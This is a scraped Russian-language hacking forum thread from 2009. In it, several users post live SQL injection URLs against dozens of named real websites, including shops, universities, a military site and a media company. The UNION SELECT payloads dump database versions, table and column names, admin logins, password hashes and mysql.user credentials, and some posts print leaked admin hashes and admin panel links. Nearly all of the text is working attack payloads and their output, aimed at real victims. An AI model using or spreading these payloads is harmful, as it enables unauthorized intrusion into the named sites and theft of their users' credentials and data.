http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,oa_login,0x3a ,oa_pswd_md5,0x3a,email,0x3a,def_discount),4+from+ oa_users
MySQL 5.0.81-log
также есть интересные таблицы
bank_rekvizit
carts
думаю ясно что в них можно найти)
http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,id_br,0x3a,bk _name,0x3a,rekvizit,0x3a,schet,0x3a,name,0x3a,nal) ,4+from+bank_rekvizit
============================
http://www.wismamerdeka.com/shop_info.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(0x0b,username,0x3a,password),14,15,16,17,18,1 9,20,21,22+from+_user
MySQL5.0.51b-community-nt
http://www.wismamerdeka.com/admin.php
з.Ы. Чет сегодня на скули фартит, со всем бы так)
[x60]unu
01.11.2009, 01:01
medpipe.ru - - -
http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,version(),5,6
version - 5.0.51a-24+lenny2-log
user - medpipe_ru@localhost
database - medpipe_ru
os - debian-linux-gnu
table - user - (user_login, user_password)
http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,concat(user_login,0x3a3a3a,user_password),5, 6/**/from/**/sys_users/**/limit/**/1,1
http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,2,3,group_concat(0x0b,column_name ),5,6,7+from+information_schema.columns+where+tabl e_name=0x666b5f61646d696e
fk_admin::name,Password
MySQL 5.0.81-community-log
http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,group_concat(0x0b,name,0x3a,passw ord),3,4,5,6,7+from+fk_admin
INSTITUTE FOR MEDICAL RESEARCH AND OCCUPATIONAL HEALTH:
http://www.imi.hr/stranica.php?id=11+union+select+1,2,3--
Version: 5.0.51a-24+lenny2
Database: imi@localhost
User: imi
http://www.medialine.eu/sezioni.php?m=79&mm=97&mmm=72&id=27+UNION+SELECT+concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,55,56/*
Database Version: 4.1.22-standard-log
Database name: medialine_eu_medialine
User name: DG3178_medialine@81.88.49.18
Os: pc-linux-gnu
http://hmm3.fclan.ru/redir.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
5.0.45:us1204h@localhost:db1204a
http://g-tuning.ru/models/model/?mark=10&model=-112+union+select+concat_ws(0x3a,version(),user(),d atabase())
5.0.67:u2039@localhost:gtuningru
Строительная компания "НЭП":
http://www.sk-nep.ru/files.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10--
Version: 5.0.45
Database: sk-nep_main
User: db_sk-nep@localhost
http://www.excelsoft.co.id/read_news.php?id=-44+union+select+1,2,group_concat(0x0b,name,0x3a,pa ssw),4,5+from+admin
MySQL 5.0.51a-log
=============================
http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +information_schema.columns+where+table_name=0x706 87062625f7573657273
http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,user_id,0x3a,u sername,0x3a,user_password),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+phpbb_users
MySQL 5.0.77-log
логинимся в форуме
http://www.ior.ro/produse/index.php?kCtg=6&ID=-50+UNION+SELECT+1,2,3,4,convert(concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os)+usi ng+latin1),6,7,8,9,10--
Database Version: 4.1.11-Debian_4sarge7-log
Database name: dbior
User name: ior@localhost
Os: pc-linux-gnu
[x60]unu
01.11.2009, 21:36
http://www.cilvekaekologija.lv/index.html?id=1/**/and/**/1=2/**/union/**/all/**/select/**/1,2,unhex(hex(version())),4,5,6,7,8,9/*
version - 4.1.14
user - avestl@localhost
database - cilveko
www.euroasiasemiconductor.com/magazine.php?id=45+union+select+1,group_concat(0x0 b,user_id,0x3a,name,0x3a,password,0x3a,email),3,4, 5,6,7+from+cieh_users&date=2007-02-03
MySQL 5.0.45
http://www.farmavet.ro/prez_produs.php?id=-76+UNION+SELECT+1,2,3,cast(concat_ws(0x3a,version( ),database(),user(),@@version_compile_os)+as+binar y),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61--
Database Version: 4.1.11-nt
Database name: farmavet
User name: ifarmavet@localhost
Os: win32
pelligrim
01.11.2009, 23:02
http://vetka.server.by/?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
4.1.22:vetka@localhost:vetka
http://www.radiozavod.com/?prod=-16+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--
5.0.81-community:radio_radio@localhost:radio_radio
http://klinok-blade.ru/rubrikator/index.php?id=999999+union+select+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6--
5.0.67-log:u82142@10.10.223.245:u82142
http://www.kon-tiki.com.ua/index.php?w=country&lang=ru&id=-6+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--
5.0.45-log:kontiki@db.skif.com.ua:kontiki
http://rock.aplus.by/providers/?id=-9+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3--
5.0.32-
Debian_7etch11:rockaplusby@localhost:rockaplusby
http://www.almaz-pk.ru/articles?id=99999+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5--
5.0.82-log:almazpk@cub.mplik.ru:almazpk_tmp
http://www.elitstroymaterials.ru/inside.html?action=news&id=-5+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--
5.0.77:elitstro_elit@localhost:elitstro_elit
2pelligrim, скулю на santafe-club.Ru я выкладывал на прошлой стр
http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7,8+from+information_schema.columns+where+ta ble_name=0x61646d696e75736572
MySQL 5.0.81-community
http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,adminuser,0x3 a,password,0x3a,level),4,5,6,7,8+from+adminuser
админка http://www.solitaire-labs.com/admin
==============================
http://serbianbaseball.org/view_news.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x 3a,pass),3,4+from+admin
MySQL 5.0.81-community
==============================
Забугорный Вэб - Хостинг
www.risingnet.net/news_info.php?id=-4+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables+limit+28,1
MySQL 5.0.45
http://www.risingnet.net/news_info.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x757365725f 6163636f756e74+limit+32,1
интересные таблицы
user_account, user_webinfo
думаю можно убить время и докрутить до логического конца, мне не хватило желания
Магазин «Деревянный Рай»:
http://www.pskovles.ru/tovar.php?id=-1+union+select+1,2,3/*
Version: 4.1.22-log
Database: konkurent_svoi
User: konkurent_svoi@localhost
s0l_ir0n
02.11.2009, 15:12
Микрокредитная организация "Алтын Орда"
http://altynorda.kz/news.php?id=0%20union%20select%201,ConCat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,3,4%2 0--
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x64656661756c745f55 7365724442--
интересные таблици:
default_UserDB::ID:user_name:email_Address:user_pa ssword:isAdmin
default_UserDBElements
default_memberFormElements
default_userFavoriteListings
default_userFormElements
default_userImages
default_userSavedSearches
долбить буду default_UserDB
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,concat_ws(0x3a,user_name,0x3a,use r_password),3+from+default_UserDB--
хэш админа отлично находит на паблик базах
админка: http://greenstreetprop.com/admin
MySQL 5.0.82sp 1
удобно что выводит все строки сразу, не надо играться с лимитами и гроуп конкатом.
слепая
http://www.izak.ru/article/index.php?id_article=-286+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14
u15468@10.10.153.207:u15468:5.0.67-log
если и это боян, то объясни мне как ты степень боянности определяешь ?
специально проверил на все ключевые слова в поиске, его нету.
http://www.antonpaleev.ru/show.php?id=52+and+1=2+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13+--+
http://www.ppp-pf.ru/show.php?id=154+and+1=0+union+select+1,2,3,4,5,6,7 ,8--
http://www.egyptt.ru/show.php?id=4+and+1=0+union+select+1,2--
http://www.datatec.ru/show.php?id=271+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14--
http://www.expertitalia.ru/show.php?id=1252182905+and+1=0+union+select+1,2,3, 4,5,6,7,8,9,10,11,12--
http://www.pc-coolers.ro/produs.php?id=-103+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21/*
Database Version: 4.1.22-log
Database name: pcc
User name: pcc@localhost
Os: redhat-linux-gnu
http://job.aviso.ua/news.php?id=-1482+union+select+1,2,version(),4,5,6,7--
http://orgo-x-libris.ru/show.php?id=13+and+1=0+union+select+1,2,3,4,5,6,7, 8,9,10--
http://www.jupiter-group.ru/product/?menu=Case&flag=2&id=46+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30--
http://www.ansmann.ru/catalog/second_1_1.php?id=-62+union+select+1,2,3,4,5,6,7,8+--+
http://wi-fi.auditory.ru/NNews.php?action=View&ID=30+and+1=0+union+select+1,2,3,4,5--
http://www.volgotrans.mv.ru/front/catalog.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
5.0.51a-24-log:kater@localhost:volgotrans
http://www.alona-bondarenko.com/index.php?area=1&p=gallery&action=showimages&galid=-30+union+select+1,concat_ws(0x3a,version(),user(), database()),3
5.0.67-percona-highperf-b7-log:woyager@localhost:woyager
http://www.unitedbakers.ru/index.php?section_id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12--
http://www.unitedbakers.ru/index.php?section_id=-1+union+select+1,2,concat_ws(0x3a,email,u_login,u_ passwd),4,5,6,7,8,9,10,11,12+from+users+limit+100, 10000--
5.0.67:unitedbakersru@78.108.81.221:unitedbakersru _ub : portbld-freebsd7.0
http://www.newage.ru/?mod=s_page&sp_id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database(),@@version_compile_os),6,7,8,9,10,1 1,12--
http://www.newage.ru/?mod=s_page&sp_id=-2+union+select+1,2,3,4,concat_ws(0x3a,password,use r),6,7,8,9,10,11,12+from+mysql.user--
5.0.67-log:root@localhost:test:redhat-linux-gnu
http://www.technique.ro/produs.php?produs=6+UNION+SELECT+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os),8,9,10,11,12,13
Database Version: 5.0.81-community
Database name: rtec0602_technique
User name:rtec0602_rtech@localhost
Os: pc-linux-gnu
[x60]unu
03.11.2009, 01:20
permneft.lukoil-perm.ru PR=4 TC=40 - поддомен Лукоил
http://permneft.lukoil-perm.ru/index.html?id=1/**/and/**/substring(version(),1,1)=5
Ветка - 5
http://www.ren-tv.tv/newss.php?news_id=-1300 union select 1,2,3,4,concat_ws(0x3a,user(),version(),data base()),6 --
rentv2@localhost
4.1.25-log
rentv2
ТИЦ: 10
PR: 5
http://ebar.com/news/article.php?sec=news&article=-4254%20union%20select%201,2,3,4,5,6,7,concat_ws%28 0x3a,user%28%29,version%28%29,database%28%29%29,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27%20--
Version = 5.0.81-community
User = ebar_ebar@localhost
Database:ebar_ebclass
Database:ebar_ebar
http://www.peabody.uga.edu/news/event.php?id=59+and+1=0+%20Union%20Select%201,2,UN HEX%28HEX%28version%28%29%29%29,4,5,6,7,8,9
Version = 5.0.82-log
User = Peanuts@localhost
Database:mysql:Dev_Peabody_com_live:PeasandCarrots :test
http://www.reden.dk/index.php?section_id=-52%20union%20select%20database%28%29%20--
Version = 4.1.22-standard
User = reden@linux4.wannafind.dk
Database = reden_dk_db4
http://www.antonygormley.com/wip.php?sectionid=1+and+1=0+%20Union%20Select%201, database%28%29,3,4,5/*
Version = 4.0.24_Debian-10sarge2-log
User = antonygo@z1lnx004.web.vi.net
Database = antonygo
http://www.tni.mil.id/gallerydtl.php?id=147&cid=-27+UNION+SELECT+1,2,3,concat_ws%28version%28%29,us er%28%29,database%28%29%29,5,6,7--
версия MySQL: 5.0.77
юзер: ayam@localhost
имя базы: elang
из таблички user вывел:
[0]:admin:a55891977489d2f3c39855dfc9d0e211 [1]:puspen TNI:12412e18e39e9ebc5c67cff8a625ed73 [2]:bangsawancyberindo:3ceda926b2438e8f900d64b74e9ed2 36
Katholieke Universiteit Leuven:
http://soc.kuleuven.be/sw/nieuws/itemid.php?id=-7+union+select+1,2,3,4,unhex%28hex%28concat_ws%280 x20,version%28%29,database%28%29,user%28%29%29%29% 29,6,7,8,9,10,11,12/*
Version: 4.1.13-standard-log
Database: fsw
User: fsw@tobias.cc.kuleuven.ac.be
PR: 6
http://www.academicintl.com/main_pages.php?section_id=5&content_id=121+and+1=0+%20Union%20Select%20%20%20U NHEX%28HEX%28version%28%29%29%29
Version = 5.0.70-log
User = apihost_webDB@localhost
Database = apihost_API :: apihost_dev
Tables:CP_users :: AO_users
Columns: Table CP_users
LAST_LOGIN
FIRST_NAME
LAST_NAME
EMAIL
PASSWORD
DOKUGROUP
pelligrim
03.11.2009, 08:11
http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7--
4.1.25-log:atur@localhost:atur
http://advayta.org/item/000013/?id=3+and+substring(version(),1,1)=5
5.1.35
http://www.virsteana.ro/en/produs.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os)--
Database Version: 4.1.21-standard-log
Database name: virst_virsteana
User name: virst_virst@localhost
Os: pc-linux-gnu
INFOCYT (PR: 6):
http://www.infocyt.cl/info.php?id=-1+union+select+1,2,3,4,5,6/*
Version: 4.1.20
Database: infocyt
User: adm_infocyt@localhost
http://www.tecoprestcom.ro/produs.php?id=-10+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7
Database Version: 4.1.22-log
Database name: whtecoprestcomroa
User name:tecoprestcomroa@localhost
Os: redhat-linux-gnu
Pension Primus:
http://www.czechpensionen.cz/info.php?id=-1+union+select+1,2/*
Version: 4.0.18-Max-log
Database: czechpensionendb
User: pension@localhost
-----------------------------------
Axiom College (PR=4):
http://www.axiomcollege.com.au/training-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16--
Version: 5.0.67-community-nt
Database: axiom
User: root@localhost
Есть доступ к mysql.user:
http://www.axiomcollege.com.au/training-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x20,us er,password,file_priv),11,12,13,14,15,16+from+mysq l.user--
http://www.scauneitalia.ro/produs.php?id=-47+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11
Database Version: 5.0.51a-community
Database name: scauneit_wisemedscauneitalia
User name:scauneit_wisemed@localhost
Os: redhat-linux-gnu
[underwater]
03.11.2009, 13:56
http://www.pure-red.com/en/hongkong/news/index.php?news_id=-1%20union%20select%201,2,group_concat(username,0x3 a,password),4%20from%20admins--
http://www.musiquemachine.com/reviews/reviews_template.php?id=1+AND+1=2+UNION+SELECT+1,2 ,3,4,5,6,7,8,%20version(),10,11,12,13,14,15,16,17--
Владельцам червонца посвещается
http://vaz2110.net/view_text.php?id=-4+union+select+1,2,3,group_concat(0x0b,column_name ),5,6,7+from+information_schema.columns+where+tabl e_name=0x757365726c697374
MySQL 5.0.51a-24+lenny1
http://vaz2110.net/view_text.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x 3a,pass),3,4,5,6,7+from+userlist
типа админка http://vaz2110.net/admin/ прошол по пути в ошибке
http://vaz2110.net/admin/include/
http://www.xxbt.com/cartoon.php?id=-1+union+select+1,2,3,4/*
Version: 5.0.22-log
Database: xxbt
User: xxbt_f@localhost
http://review-novoros.ru/article.php?id=-1554+union+select+1,2,3,table_name,5,6,7+from+info rmation_schema.tables+limit+20,1--
---
http://www.freefloat.net/content.php?section_id=1&subsection_id=5&ID=42+and+1=0+Union%20Select%201,2,version%28%29,4 ,5,6%20--
Version = 4.0.18-standard-log
User = root@localhost
Database = freefloat
http://calodox.scene.org/demoo/select.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Version: 5.0.77-1
Database: calodox
User: calodox@hosted.scene.org
---------------------------------------------
http://www.mnhospitaljobs.com/hospitalprofile-select.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
Version: 5.0.81-community
Database: dsmmn_mnhospit
User: dsmmn_llcoolb@localhost
http://www.axcent.ro/detalii_produs.php?lang=romana&ID=225&m_catid=161&pID=-450+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
Database Version: 4.1.20-log
Database name: netaxcentro
User name: axcentro@193.226.140.172
Os: redhat-linux-gnu
http://www.denisamarket.ro/produs.php?lang=romana&ID=-58+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7--%20&m_catid=13
Database Version: 4.1.20-log
Database name: netdenisamarketro
User name: denisamarketro1@193.226.140.172
Os: redhat-linux-gnu
http://jaydonaldson.com/section.php?section_id=1+and+1=0+Union%20Select%20 UNHEX%28HEX%28version%28%29%29%29
Version = 5.0.77-community
User = donaldso_jaydona@localhost
Database = donaldso_jaydonaldson
PR: 6
http://www.manilawater.com/section.php?section_id=6&category_id=34+and+1=0+%20Union%20Select%201,2,3,v ersion%28%29,5,6,7,8%20,9%20,10
Version = 5.0.32-Debian_7etch11-log
Database = spark-mwc
User = spark-mwc@localhost
Tables:users
Columns: Table users
user_login
user_password
user_name
user_email
user_type
user_status
PR: 4
http://www.autocam.com/main.php?section_id=6+and+1=0+%20Union%20Select%20 %20%20UNHEX%28HEX%28version%28%29%29%29%20,2,3,4,5 ,6,7,8,9
Version = 4.1.16-standard
User = autocam@192.168.5.6
Database = autocam
http://www.leefirerescue.com/view.php?section_id=18+and+1=0+Union Select 1,UNHEX(HEX(version())),3 --
Version = 5.0.77-community
User = leefddb@localhost
Database = leefd
Lensys
Rogue
SpamAssassin
Timesheets
Vtodd
agency
bfd1sql
dcaffiliate
easyadmin
ebdesign
er_ares_members
fnclist
gbwphpcollab
graphicdetails
hamptonattack
jackbingham
k1foo
lenharth
lensync_joomla
lightware
mysql
mysqlorig
nmhfdb
nuke
pcarc
portal
rowley
scffwa
seacoastbb
secret
space
telacovers
test
trimark_dada
trimark_mambo
vpopmail
vtodddb
w1roc_bb
w1wqm
http://www.courierjournal.net/sectionfront.php?section_id=7+and+1=0+Union%20Sele ct%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34%20--
Version = 4.0.27
User = cjadmin@localhost
Database = cjnet
Housing Development Corporation:
http://www.hdc.com.mv/Projects/project-select.php?id=-1)/**/union/**/select/**/unhex(hex(user())),unhex(hex(user())),unhex(hex(us er())),unhex(hex(user())),unhex(hex(user())),unhex (hex(user())),unhex(hex(user())),unhex(hex(user()) ),unhex(hex(user())),unhex(hex(user())),unhex(hex( user())),unhex(hex(user())),unhex(hex(user())),unh ex(hex(user())),unhex(hex(user())),unhex(hex(user( ))),unhex(hex(user())),unhex(hex(user())),unhex(he x(user()))/*
Version: 4.1.7
Database: hdc
User: hdc@10.16.4.5
Ух, задолбался с ней... :)
Democratic Pacific Union:
http://www.dpu.org.tw/En/Service.php?ID=37&ArticleID=-1+union+select+1,2,unhex(hex(version()))--
Version: 5.0.18
Database: dpu_database
User: root@localhost
Вывод - в ссылке на картинку "Download Now".
-------------------------------------------------------------
Institution Régionale des Sourds et des Aveugles:
http://www.irsa.fr/service.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38--
Version: 5.0.81-0.dotdeb.0-log
Database: H206901
User: H2069@localhost
------------------------------------------------------------
MasterLube:
http://www.masterlube.com/services/service.php?id=-1+union+select+1,2,3,4,5,6,7--
Version: 4.1.12-log
Database: mayzie
User: mailbox@localhost
http://ski.stel.ru/rus/forage.shtml?id=-236+union+select+1,2,concat_ws(0x3a,version(),user (),database(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
4.1.25:arasia@localhost:skivagi: portbld-freebsd6.1
http://www.elmh.ru/elmcatalog/?subclass=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase(),@@version_compile_os)--
4.0.27-log:elektromash@zvm8.host.ru:elektromash:i86pc-solaris2.8
http://www.loretta.ru/?view=-868+union+select+1,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os)--
4.1.22-standard:loretta@own3.web-soft.ru:loretta: pc-linux-gnu
http://www.stplus.ru/content.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),user( ),database(),@@version_compile_os),4--
5.0.32-Debian_7etch11-log:stplusru_db@localhost:stplusru_db: pc-linux-gnu
http://rybalka.zooclub.ru/indexr.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),user(),database(),@@version_compile_os)--
5.0.81-community-log:zooclub_zooclub@localhost:zooclub_rybalka: pc-linux-gnu
http://www.ma3da.ru/downloads.php?dg_id=1/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database(),@@ver sion_compile_os),3
5.0.56-lk-log:ma3daru@localhost:ma3daru: pc-linux-gnu
http://www.jobru.ru/?act=data&from=podrubriki&type=resume&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase(),@@version_compile_os),3,4--
5.0.27:ariadna@localhost:jobru:redhat-linux-gnu
http://www.audi-vitebskiy.ru/index.php?ob=car_comp&idclass=-1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database(),@@v ersion_compile_os),4,5,6/*
4.1.25-log:00131350@localhost:db00131350:unknown-freebsd4.10
Manches LP:
http://www.manches.com/practices/family/service.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--
Version: 5.0.45
Database: manches
User: manches@localhost
http://www.skags.ru/dissov.php?uid=-1+union+select+1,2,3
4.0.23
SKAGS_DB
tabl poll_user
http://www.skags.ru/dissov.php?uid=-1+union+select+1,concat_ws%280x3b,username,userpas s%29,3+from+poll_user--
:p
Strategic Energy Research
4.1.22-max-log:energy:energy@metro.gatech.edu:sun-solaris2.9
http://www.energy.gatech.edu/research/research.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4--
админка
http://www.energy.gatech.edu/admin/
http://www.promen.ro/produs.php?id=i-1&subcat=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os)--
Database Version: 4.1.22-standard-log
Database name: promen_promencontent
User name: promen_root@localhost
Os: pc-linux-gnu
Formel3.de pr4
ATS Formel 3 Cup
http://www.formel3.de/news.php
?id=null+union+select+null,concat_ws(char(32,124,3 2),version(),user(),database(),@@version_compile_o s),null,null,null,null,null,null4.1.22-standard-log | db161837_7@local2 | db161837_7 | pc-linux-gnu
Проезжая в автобусе решил чемнибудь заняться, а конкретно, тряхнуть стариной и поискать скули в постгре
http://www.vgihs.edu.in/popnews.php?nid=-4+union+select+usename||chr(58)||passwd+from+pg_us er+limit+1+offset+2--
http://www.vgihs.edu.in/popnews.php?nid=-4;select+cast(version()+as+int)--
PostgreSQL 8.0.8 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 4.0.2 20051125 (Red Hat 4.0.2-8)
кста edu)
ILYAtirtir
04.11.2009, 00:41
ГИПЕРМАРКЕТЫ «КАРУСЕЛЬ»
http://karusel.ru/personnel.php?city=-12+union+select+1,concat_ws(0x3a,database(),user() ,version())&all=12
karusel_www:karusel@localhost:5.0.45-log
nemaniak
04.11.2009, 01:59
sweeto.co.uk PR-1
http://euwb.sweeto.co.uk/thread.php?threadid=-350+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8+--+&page=3
5.0.82-community:web81-sweeto@localhost:web81-sweeto
stratfordboilerstoves.co.uk PR-3
http://www.stratfordboilerstoves.co.uk/online_spares.php?model=%27+union+select+concat_ws (0x3a,version(),user(),database()),2,3,4,5,6,7,8,9 +--+
5.0.82-community:web100-aarrow@web43.extendcp.co.uk:web100-aarrow
shakies.co.uk PR-2
http://www.shakies.co.uk/vote/results.php?pollid=1%27+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5+--+
5.0.82-community:web80-vote@localhost:web80-vote
DezMond™
04.11.2009, 12:31
http://www.katemagic.ru/index2.php?kind=-0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.assotecnicaofferte.it/pop.php?ID=-877+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+/*+
http://www.usefulandagreeable.com/magazine.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,9 8,99,100,101,102,103,104,105+/*+
http://www.nourhaikphoto.com/photos.php?groupe=144&album=-518+union+select+1,2,3,4,5,pass+from+user+/*+
http://livenloudmagazine.com/photos.php?groupe=95&album=-122+union+select+1,2,3,4,5,pass+from+user+/*+
На этот раз мускул
http://vmcenter.ru/newsdetail.php?id=-4+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name=0x757 3657273
MySQL 5.0.27
http://vmcenter.ru/newsdetail.php?id=-4+union+select+concat(0x0b,login,0x3a,password)+fr om+users
судя по всему эта таблица пуста
институт МГИМО
http://www.miu.mgimo.ru/siteindex.php?page=38&mode=group&edtype=1&gradyear=9&specialty=&id=-16+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31--
4.1.21-community-nt:mgimo_miu:mgimo_miu@localhost:Win32
http://education.centrinvest.ru/person.php?id=-1544704+union+select+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),14,15,16,17--
5.0.70-log:edu:edu@localhost: pc-linux-gnu
view-source:
http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+limit+1,1
http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,CONCAT((SELECT+CONCAT_WS(0x3 a,Email,Parola,Nume)+FROM+tronica_infotr.angajati+ LIMIT+0,1)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+limit+1,1
Database Version: 5.0.81-community-log
Database name: tronica_infotr
User name: tronica_hogast@localhost
Os: unknown-linux-gnu
http://www.echodelta.net/gaer/aerodrome.php4?id=-144+union+select+1,concat_ws(0x3c42523e,user(),dat abase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 +--+
User: echodeltecho1@10.0.65.111
Database: echodeltecho1
Version: 4.0.25-standard-log
http://www.bigrpromotions.com/view.php?postID=-364+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version())+--+
User: mrgrim8888@72.167.232.203
Database: mrgrim8888
Version: 4.1.22-max-log
http://www.ad-titude.com/comments.php?postid=-140+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6+--+
User: rene@ps12859.dreamhost.com
Database: content
Version: 5.0.67-userstats-log
http://www.latodis-med.com/produs.php?id=74+UNION+SELECT+1,2,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),4 ,5,6,7,8,9,10,11,12,13+LIMIT+1,1--
Database Version: 5.0.82-msl-usrs-sure2-log
Database name: latodis_latodis
User name: veterinare@localhost
Os: unknown-linux-gnu
http://abstinenceeurope.org/blog/index.php?postid=-136+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9+--+
User: abstinence@localhost
Database: abstinencedb
Version: 4.1.22
http://www.autozap.ru/forum/index.php?postid=-7208+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),database(),version())+--+
User: autozap@mail.autozap.ru
Database: autozap
Version: 5.0.24a-community-nt
Сайт какойто авиакомпании
